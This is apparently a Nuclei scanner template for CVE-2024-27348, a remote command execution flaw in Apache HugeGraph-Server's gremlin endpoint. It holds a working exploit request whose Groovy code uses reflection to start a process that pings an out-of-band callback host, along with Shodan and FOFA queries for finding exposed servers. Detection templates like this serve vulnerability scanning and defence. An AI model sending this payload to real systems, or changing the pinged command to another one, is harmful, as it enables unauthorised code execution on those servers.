id: CVE-2024-27348

info:
  name: Apache HugeGraph-Server - Remote Command Execution
  author: DhiyaneshDK
  severity: high
  description: |
    Apache HugeGraph-Server is an open-source graph database that provides a scalable and high-performance solution for managing and analyzing large-scale graph data. It is commonly used in Java8 and Java11 environments. However, versions prior to 1.3.0 are vulnerable to a remote command execution (RCE) vulnerability in the gremlin component.
  reference:
    - http://www.openwall.com/lists/oss-security/2024/04/22/3
    - https://hugegraph.apache.org/docs/config/config-authentication/#configure-user-authentication
    - https://lists.apache.org/thread/nx6g6htyhpgtzsocybm242781o8w5kq9
    - https://github.com/Zeyad-Azima/CVE-2024-27348
    - https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-27348
    - https://nvd.nist.gov/vuln/detail/CVE-2024-27348
  classification:
    cve-id: CVE-2024-27348
    cwe-id: CWE-77
    epss-score: 0.00045
    epss-percentile: 0.15047
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"HugeGraph"
    fofa-query: title="HugeGraph"
  tags: cve,cve2024,hugegraph,rce,apache

http:
  - raw:
      - |
        POST /gremlin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"SL7\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"ping\", \"{{interactsh-url}}\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(header, "application/json")'
          - 'contains(body, "inputStream\":")'
        condition: and
# digest: 4a0a00473045022100aa9ae92d5900b75820e9ffcd29849fac5041ac03f2ae87c595cd533beb114ca002206bb3b4a4720b2ec86023bcbef0e2274fc1fb729953519ccad6dded1328e88770:922c64590222798bb761d5b6d8e72950